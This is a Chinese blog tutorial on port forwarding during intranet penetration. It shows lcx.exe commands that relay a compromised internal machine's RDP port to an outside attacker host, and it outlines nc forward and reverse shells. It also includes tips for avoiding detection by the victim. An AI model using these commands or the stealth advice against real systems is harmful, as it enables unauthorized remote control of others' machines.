内网渗透之端口转发

内网端口转发最常见的不外乎lcx与nc反弹了,好久不用快忘了,今天总结一下

一.使用lcx进行内网端口转发

Lcx.exe是一个端口转发工具,相当于把目标服务器A上的3389端口转发到具有外网ip地址的B机上(即我们自己的主机或是已经控制的主机),这样链接B机的3389端口就相当于链接A机的3389端口了,Lcx程序多用于被控制计算机处于内网的时候,被控制机可能中了木马程序,虽然能够进行控制,但还是没有使用远程终端登录到本机进行管理方便,因此在很多情况下,都会想方设法在被控制计算机上开启3389端口,然后通过lcx等进行端口转发,进而在本地连接到被控制计算机的远程终端并进行管理和使用。

1.确定被控制计算机的IP地址

ipconfig /all查看网络配置情况,例如被控计算机的IP为192.168.80.129

2、在被控制计算机上执行端口转发命令

lcx.exe –slave 公网IP +端口 内网IP +端口

在被控制计算机上(A机)执行 lcx -slave 218.69.13.35 51 192.168.80.129 3389,执行完成后会给出一些提示。如下图:

说明:

lcx一共有三条命令,第一条命令(lcx -listen 51 3389)(3389可以设置为任意没使用的端口数字)是在具有外网独立IP的计算机上执行(即B机),表示在本机上监听51端口,该端口主要是接受被控制计算机3389端口转发过来的数据;第二条命令(lcx -slave 218.69.13.35 51 192.168.80.129 3389)表示将本机IP地址为192.168.80.129的3389端口转发到远程地址为218.69.13.35的51端口上;第三条命令式端口转向。

3.在本机上执行监听命令

在本机cmd下执行 lcx -listen 51 3389命令,监听51端口,监听成功后,会显示如下图:

注:这个时候已经将内网的3389转发到了公网机器的3389端口,我们在本地机器上远程公网IP+3389 ,就连接上了内网机器的3389

注意:

(1)在本机上监听的端口必须是未使用的端口,可以使用 netstat -an |find “51”命令来进行查看,如果没有显示结果则是表示51端口可以用来进行监听。

(2)被控制计算机与本机成功建立连接后会不停的显示连接数据,如果未出现发送数据和接受的情况,说明连接建立不成功。如下图:

4.在本机使用远程终端进行登录

打开远程终端连接器,输入127.0.0.1进行连接后,即可远程进入被控制计算机的桌面,

注意:
(1)如果被控制的计算机是服务器,则在登录时可以直接进行登陆;如果被控制计算机是windows系统,则最好选择用户不在计算机的时间进行登陆,否则容易被发现;

(2)不要轻易在被控制计算机上建立账号,尤其是windows,建立账号后,会立即在登陆界面中进行显示。

二.nc反弹

最好记的就是用真实操作来做笔记了

nc反弹有正向连接与反向连接

环境:本机:192.168.43.142(win7) 远程机器:192.168.43.137(xp)

1.nc正向连接

在远程机

---返回xp的cmdshell

在本机

成功之后,本地机器就获得了一个远程机器的shell

2.nc反向连接

在本机运行上

在远程机

然后成功之后,我们在本地机器上看一下,已经获得了远程机器的cmdshell

时间: 2024-10-04 22:06:21

内网渗透之端口转发的相关文章

liunx 公网跳转到内网(做端口转发)使用xshell工具

1.使用xshell连接到公网(ip:port)用户名密码 2.在此处添加转移规则 3.右键点击添加(选择socks4/5协议 端口 填写你需要转发的端口) 3.连接到内网 跟之前一样(ip:port)不过,这里需要代理 4.添加代理端口 上传文件可使用(xftp)也可以根据RZ命令 原文地址:https://www.cnblogs.com/aizj/p/9210709.html

内网渗透+基础+工具使用=自己理解

目录 1.代理 2.内网命令 3.抓密码 4.ipc$共享目录利用 5.端口漏洞 6.溢出 1.代理 端口转发工具有很多比如:rebind2  eDuh  ssock  reDuh  lcx  socks5 等--.. 下面介绍我比较喜欢的2款工具LCX+ socks5 1.lcx 路由器加端口 TCP协议 ,固定IP地址本机 大马设置 Local Ip : 转发ip Local Port : 转发端口 Remote Ip :本机ip (ip138.com外网ip) Remote Port :

内网渗透思路

Sky's自留地 关注互联网安全,关注安全&攻击技术. 搜索关键字搜索 首页申请链接 内网渗透测试思路[转自网络] 作者: sky 孵化于: March 15, 2015 家属: 学习类,技术类 访问: 2,136 次 写在前面渗透测试是门技术,也是一门艺术.这门技术(艺术)一开始也不是每个人都会的,正所谓没有人一出生就会走路,从不懂到入门到深谙,一步步慢慢来,每个人都是这样:但是在这个过程中,思路无疑是最重要的,没有做不到只有想不到,就跟咱们高中解题时有了思路就迎刃而解一样,手里拿着铲子(技巧

内网渗透学习

在乌云看到了这篇文章,看的我太爽了. 从TCL某漏洞看内网渗透教学分享之内网信息探测和后渗透准备  披露状态: 2015-02-18: 细节已通知厂商并且等待厂商处理中2015-02-27: 厂商已经确认,细节仅向厂商公开2015-03-09: 细节向核心白帽子及相关领域专家公开2015-03-19: 细节向普通白帽子公开2015-03-29: 细节向实习白帽子公开2015-04-04: 细节向公众公开 简要描述: 本来打算发人人网的,但是苦逼的是我刚进去内网就貌似被t出来了,服务器直接宕了,等

内网渗透常用手法

作者:凋凌玫瑰来源:NCPH 内网,很多人应该形成了这个概念,很多大型网络的外部网站或是服务器不一定有用,当然外网也是一个突破口.很多时候我们直接从外网入手,随着安 全的不断加固,已变得越来越困难.那么黑客通常是怎么进行内网渗透的,内网渗透又是怎样与社会工程学联系起来呢,今天主要描述黑客内网渗透的常用操作手 法,关于如何获得内网机器,请查找我以前的一篇文章<内网渗透—如何打开突破口>. 渗透的过程就是一个信息刺探.利用.思考.突破的过程.首先在我们获得一台内网的机器后应该怎么做,当然是信息刺探

内网渗透测试思路-FREEBUF

(在拿到webshell的时候,想办法获取系统信息拿到系统权限) 一.通过常规web渗透,已经拿到webshell.那么接下来作重要的就是探测系统信息,提权,针对windows想办法开启远程桌面连接,针对linux想办法使用反弹shell来本地连接. ① Webshell应该都可以调用系统cmd执行一些简单的命令,那么whoami(查看当前权限),netuser(查看用户/组),systeminfo(查看系统补丁修复情况)等常见命令应该是首先被执行 探测的. I: 不具备系统权限: ①  Ser

内网渗透工具介绍------Lcx.exe

0x00简介 Lcx是一款端口转发工具,可以将内网机器的端口映射到带公网IP的机器上.一般进行渗透的时候,通过web漏洞getshell之后,需要对其进行远程登录,这就需要用到端口映射. 0x01使用 第一步:在内网主机上上传lcx.exe文件,执行 Lcx.exe –slave RemoteHost RemotePort LocalHost LocalPort 如图中显示则连接成功 第二步:在公网机器上执行以下命令,监听51端口,转发到公网机器的3389端口 Lcx.exe –listen S

记录一次坎坷的linux内网渗透过程瞎折腾的坑

写在前面 每个人都有自己的思路和技巧,以前遇到一些linux的环境.这次找来一个站点来进行内网,写下自己的想法 目标环境 1.linux  2.6.32-358  cpu 架构(x86_64)AND发行版 Red Hat Enterprise Linux Server release 6.4 2.DMZ+防火墙+行为监控,外网开放8080 8084 ... 3.服务器有utibadn用户的权限一枚 Shell具体怎么拿到的就不说了,记录下自己比较思路坎坷的一次内网渗透以作回顾: 外网nmap得到

内网渗透利器--reDuh(webshell跳板)

作者:sai52[B.H.S.T] 国外大牛的作品,偶顺手写了个使用说明.E文好的看原文  http://www.sensepost.com/research/reDuh/ 这个工具可以把内网服务器的端口通过http/https隧道转发到本机,形成一个连通回路.用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口. 本机-------客户端---------(http隧道)-----------服务端------------------内网服务器 服务端是个webshell(针对